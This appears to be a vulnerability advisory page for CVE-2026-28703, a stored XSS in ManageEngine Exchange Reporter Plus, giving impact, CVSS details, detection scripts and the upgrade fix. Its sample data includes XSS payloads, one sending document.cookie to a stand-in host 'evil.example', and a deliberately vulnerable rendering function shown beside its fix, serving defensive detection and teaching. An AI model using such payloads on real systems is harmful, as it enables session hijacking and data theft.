HIGH · CVE-2026-28703 · CVSS 7.3

Stored XSS vulnerability

Platform

manageengine

Component

manageengine-exchange-reporter-plus

Fixed version

5802

AI confidence: high · NVD · EPSS 0.02% · Reviewed: May 2026

CVE-2026-28703 describes a Stored Cross-Site Scripting (XSS) vulnerability in ManageEngine Exchange Reporter Plus. An attacker holding a valid low-privileged account (PR:L in the CVSS vector) can plant a script payload that is persisted into the 'Mails Exchanged Between Users' report; the script then runs in the browser of any user who later opens that report. Builds prior to 5802 are affected, and the fix ships in build 5802.

Impact and attack scenarios

Successful exploitation of CVE-2026-28703 lets an attacker with a low-privileged account inject arbitrary JavaScript into the 'Mails Exchanged Between Users' report within ManageEngine Exchange Reporter Plus. Because the payload is stored, it executes in the browser of every user who later views the report, inside the application's origin and with that user's session. The script can therefore read and exfiltrate report data visible to the victim, perform actions in Exchange Reporter Plus as the victim (including an administrator), hijack the session if the session cookie is readable from script, and redirect the victim to phishing pages. It cannot directly reach other applications the user is signed in to, since the browser's same-origin policy confines it to this application (CVSS scope: unchanged). The blast radius is every user who opens the poisoned report, which is why a single low-privileged account can end in the compromise of administrative sessions and of the email metadata the product holds.

Exploitation status

CVE-2026-28703 was publicly disclosed on 2026-04-03. No public proof-of-concept (PoC) code had been released at the time of writing. The EPSS score is 0.02% (5th percentile), and the vulnerability is not listed in the CISA KEV catalog.

Who is at risk

Organizations running ManageEngine Exchange Reporter Plus builds below 5802 are at risk, particularly those where many users (help-desk staff, auditors, Exchange administrators) open the 'Mails Exchanged Between Users' report, since each viewer is a potential victim. Instances shared by several teams or tenants carry additional risk: a payload planted through one low-privileged account reaches every other group that views the same report.

Detection steps

• Web: fetch the 'Mails Exchanged Between Users' report with an authenticated session and look for script tags, inline event handlers or javascript: URLs in the rendered HTML that are not part of the application's own page template. While you are at it, check whether the response carries a Content-Security-Policy header at all; a missing or permissive policy means an injected script runs unhindered.

curl -s -H "Cookie: $SESSION_COOKIE" 'http://<exchange_reporter_plus_url>/reports/mails_exchanged_between_users.aspx' | grep -iE '<script|\bon(error|load|click|mouseover)=|javascript:'

The report path above is illustrative; use the report URL of your own instance, and supply a valid session cookie because the report requires authentication. Compare any hits against a known-clean copy of the report so the application's legitimate scripts are not mistaken for injected ones.

• Generic web: monitor access and error logs for requests to the report endpoint, and to the inputs that populate it, whose parameters contain script tags, event handlers or URL-encoded (including double-encoded) variants of them.

• Generic web: review responses for absent or weakened XSS defences (no Content-Security-Policy, no X-Content-Type-Options) that would make a stored payload easier to exploit.
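The two log-based checks above, worked through as an added example. This is not code from the page or from ManageEngine: the access-log format is the common/combined format of a fronting web server, the report path, sample log lines and sample report HTML are constructed for illustration, and the allow-list of legitimate script sources is an assumption you replace with your instance's own.

```python
"""Stored-XSS indicator scan for CVE-2026-28703 triage (added example).

Two checks: (1) access-log lines whose request target, after repeated URL
decoding, contains script-injection markers; (2) a fetched report page that
contains <script> blocks or inline event handlers outside an allow-list of the
application's own script sources. All inputs below are constructed samples.
"""
import re
from urllib.parse import unquote_plus

# Placeholder: substitute the report URL path of your own instance.
REPORT_PATH = "/reports/mails_exchanged_between_users"

# Injection markers, checked case-insensitively after URL decoding.
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon(error|load|click|mouseover|focus)\s*=", re.I),  # inline handlers
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"<\s*(iframe|img|svg)\b", re.I),
]

# Common/combined log format: the request target sits inside the quoted request.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines: one clean request, one encoded payload aimed at the
# report, one double-encoded payload aimed at another input of the application.
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Apr/2026:10:12:01 +0000] "GET /reports/mails_exchanged_between_users HTTP/1.1" 200 5120',
    '10.0.0.9 - - [03/Apr/2026:10:13:44 +0000] "GET /reports/mails_exchanged_between_users?subject=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 5300',
    '10.0.0.9 - - [03/Apr/2026:10:14:02 +0000] "GET /search?q=%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 800',
]

# Constructed sample report page: one legitimate script, two injected cells.
SAMPLE_REPORT_HTML = (
    '<html><head><script src="/js/app.js"></script></head><body><table>'
    '<tr><td>alice@example.com</td><td>Weekly sync</td></tr>'
    '<tr><td>mallory@example.com</td><td><script>fetch("//evil.example/?c="+document.cookie)</script></td></tr>'
    '<tr><td>bob@example.com</td><td><img src=x onerror="alert(1)"></td></tr>'
    '</table></body></html>'
)


def decode_fully(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%253C -> %3C -> <) are caught."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def matched_patterns(text: str) -> list:
    """Names of the injection markers present in text (empty list if none)."""
    return [p.pattern for p in XSS_PATTERNS if p.search(text)]


def scan_access_log(lines):
    """Return (ip, timestamp, decoded target, hits_report_endpoint, markers) per suspicious request.

    The stored payload may be submitted through a different input than the page
    that renders it, so every request is scanned and merely tagged by endpoint.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        target = decode_fully(m.group("target"))
        found = matched_patterns(target)
        if found:
            hits.append((m.group("ip"), m.group("ts"), target,
                         target.startswith(REPORT_PATH), found))
    return hits


def find_injected_script(html: str, allowlist=()):
    """Flag <script> blocks whose src is not allow-listed (or that are inline) and
    any tag carrying an inline on* event handler. Returns the flagged snippets."""
    findings = []
    for tag in re.finditer(r"<script\b[^>]*>(.*?)</script>", html, re.I | re.S):
        src = re.search(r'src\s*=\s*["\']([^"\']+)', tag.group(0), re.I)
        if src and any(src.group(1).startswith(prefix) for prefix in allowlist):
            continue  # the application's own script
        findings.append(tag.group(0)[:80])
    for handler in re.finditer(r"<[^>]+\son[a-z]+\s*=", html, re.I):
        findings.append(handler.group(0)[:80])
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious request:", hit)
    for snippet in find_injected_script(SAMPLE_REPORT_HTML, allowlist=("/js/",)):
        print("injected markup:", snippet)
```

Run it against your real access log and a saved copy of the report; the allow-list must contain the script paths your clean baseline actually uses, otherwise every page load is reported.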

Attack timeline

  1. Disclosure (2026-04-03)

Threat intelligence

Exploit status

Proof of concept: unknown
CISA KEV: no
Internet exposure
Reports: 1 threat report

EPSS

0.02% (5th percentile)

CISA SSVC

Exploitation: none
Automatable: no
Technical impact: total

CVSS vector

CVSS 3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N · 7.3 HIGH (CVSS v3.1 base score, nextguardhq.com)

Attack Vector: Network. Exploitable remotely over the network; no physical or local access is needed.
Attack Complexity: Low. No special conditions; reliably exploitable.
Privileges Required: Low. A valid low-privileged user account is enough to plant the payload.
User Interaction: Required. A victim must open the affected report for the script to run.
Scope: Unchanged. The impact is confined to the vulnerable component.
Confidentiality: High. Complete loss of confidentiality within the application; all data the victim can see is readable.
Integrity: High. Arbitrary data can be written, modified or deleted through the victim's session.
Availability: None. No impact on availability.

Affected software

Component: manageengine-exchange-reporter-plus
Vendor: Zohocorp
Affected range: 0 up to, but not including, build 5802
Fixed version: 5802

Weakness classification (CWE)

CWE-79: Improper Neutralization of Input During Web Page Generation (Cross-site Scripting), the standard classification for a stored XSS.

Timeline

  1. Reserved
  2. Published (2026-04-03)
  3. Updated
  4. EPSS updated

Mitigations and workarounds

The primary mitigation for CVE-2026-28703 is to upgrade ManageEngine Exchange Reporter Plus to build 5802 or later, which contains the fix. If an immediate upgrade is not possible, restrict access to the 'Mails Exchanged Between Users' report to the personnel who need it, and review which low-privileged accounts can feed data into it, since the CVSS vector (PR:L) indicates that a valid low-privileged account is enough to plant the payload. Strict validation of stored data and HTML output encoding at render time are the vendor-side fix that build 5802 delivers; they live in the product's own code and are not something a customer can retrofit, so do not treat them as a local workaround. Until the upgrade is applied, monitor any web application firewall fronting the instance for script-injection attempts against the report endpoint and the inputs that populate it, and keep the report reachable only over an authenticated, internal path.
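The defect class and the output-encoding fix described above, as an added example. This is illustrative Python, not ManageEngine code and not the actual patched routine: the column names, the sample rows and the idea that a mail subject is the injection carrier are assumptions made to show the mechanism, and the parser-based check stands in for what a browser would execute.

```python
"""Vulnerable report rendering beside its hardened form (added example).

A tabular report built by string concatenation emits stored values as markup,
so a payload persisted in one row runs for every viewer. HTML-entity encoding
at output time turns the same value into inert text. The rows and column names
are constructed for illustration.
"""
import html
from html.parser import HTMLParser

COLUMNS = ("sender", "recipient", "subject")

# Constructed sample rows; the second subject carries a cookie-stealing payload.
SAMPLE_ROWS = [
    {"sender": "alice@example.com", "recipient": "bob@example.com",
     "subject": "Weekly sync"},
    {"sender": "mallory@example.com", "recipient": "bob@example.com",
     "subject": '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">'},
]


def render_report_vulnerable(rows):
    """Stored values are concatenated straight into the page (the defect class
    behind a stored XSS): the payload is emitted as live markup."""
    body = "".join(
        "<tr>" + "".join(f"<td>{row[col]}</td>" for col in COLUMNS) + "</tr>"
        for row in rows
    )
    return f"<table>{body}</table>"


def render_report_fixed(rows):
    """Every stored value is HTML-entity encoded at output time, including quotes,
    so the browser displays the payload as text instead of parsing it."""
    body = "".join(
        "<tr>" + "".join(
            f"<td>{html.escape(str(row[col]), quote=True)}</td>" for col in COLUMNS
        ) + "</tr>"
        for row in rows
    )
    return f"<table>{body}</table>"


class ActiveContentFinder(HTMLParser):
    """Records what a browser would execute: script tags and on* handler attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script", None))
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append((tag, name))


def active_content(page: str):
    """List of (tag, attribute) pairs the browser would treat as executable."""
    finder = ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    print("vulnerable:", active_content(render_report_vulnerable(SAMPLE_ROWS)))
    print("fixed:     ", active_content(render_report_fixed(SAMPLE_ROWS)))
```

The point of parsing the output rather than grepping it is that the check answers the question a browser asks: after encoding, the payload is character data inside a td element and no img tag or onerror attribute exists for it to run from. Input validation on its own would not have been enough, because a subject line has no shape a validator could safely enforce; encoding at the point of output is what the fix depends on.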

How to fix

Upgrade ManageEngine Exchange Reporter Plus to build 5802 or later. This update corrects the stored XSS vulnerability in the 'Mails Exchanged Between Users' report.


Frequently asked questions

What is CVE-2026-28703 — XSS in ManageEngine Exchange Reporter Plus?

CVE-2026-28703 is a Stored XSS vulnerability in ManageEngine Exchange Reporter Plus builds before 5802 that allows an attacker with a low-privileged account to inject malicious scripts into the 'Mails Exchanged Between Users' report, where they run for every user who opens it.

Am I affected by CVE-2026-28703 in ManageEngine Exchange Reporter Plus?

If you are running a ManageEngine Exchange Reporter Plus build below 5802, you are affected. Upgrade to build 5802 or later to remove the vulnerability.

How do I fix CVE-2026-28703 in ManageEngine Exchange Reporter Plus?

The recommended fix is to upgrade ManageEngine Exchange Reporter Plus to version 5802 or later. As a temporary workaround, restrict access to the vulnerable report.

Is CVE-2026-28703 being actively exploited?

As of this review (May 2026) there are no confirmed reports of active exploitation of CVE-2026-28703, no public PoC, and no CISA KEV listing; the patch should still be applied proactively, because a single low-privileged account is enough to plant the payload.

Where can I find the official ManageEngine advisory for CVE-2026-28703?

Refer to the official ManageEngine security advisory for detailed information and updates regarding CVE-2026-28703: https://www.manageengine.com/products/exchange-reporter-plus/security-advisories.html
